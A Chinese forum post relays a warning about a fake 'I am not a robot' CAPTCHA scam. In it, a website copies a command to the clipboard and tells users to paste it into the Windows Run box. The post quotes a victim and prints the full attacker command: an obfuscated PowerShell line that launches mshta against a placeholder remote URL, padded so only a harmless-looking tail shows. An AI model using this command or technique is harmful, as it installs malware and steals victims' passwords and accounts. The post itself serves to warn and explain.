微博网友@t0mbkeeper 在微博揭露了一个挂马方案,真可怕。已经有受害者在评论底下现身说法了。
@MZK豆豆:
前几个月找油管下载脑袋发抽中招过,powershell远程下载了一个txt,里边有执行文件,一通找到运行程序位置和启动项,可惜还是密码泄露,PayPal盗刷了,申诉找回了。这种火绒扫不出来,真是坑
你访问一些网站的时候,网页忽然弹出提示,让你证明自己是真人。这倒也很常见,于是你点了一下那个验证窗口,又弹出提示,让你按 Win+R,然后 Ctrl+V,再回车(图一)。
你按下 Win+R,发现弹出一个窗口。再按 Ctrl+V,窗口里出现了:✅ ‘I am not a robot: CAPTCHA Verification UID: 7811’(图二)。这好像真的是在做验证。但这时只要你再按一下回车,你的电脑就会下载并执行攻击者的木马。
因为在你最开始点击那个验证窗口的时候,网站向你的剪贴板中写入的内容实际是:
powershell -w 1 -C "$l='hττps://AAAAAAAA.AAA/AAAAAA.mp4';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 7811'
这是一条下载并执行木马的命令。因为 Win+R 弹出的那个命令执行输入框地宽度有限,对过长的输入行只显示末尾部分。攻击者精确地控制内容长度,巧妙地让你只能看到末尾那段一点都不可疑的内容。等你明白过来的时候,已经晚了。
图三显然是一个受害者。
没有回复内容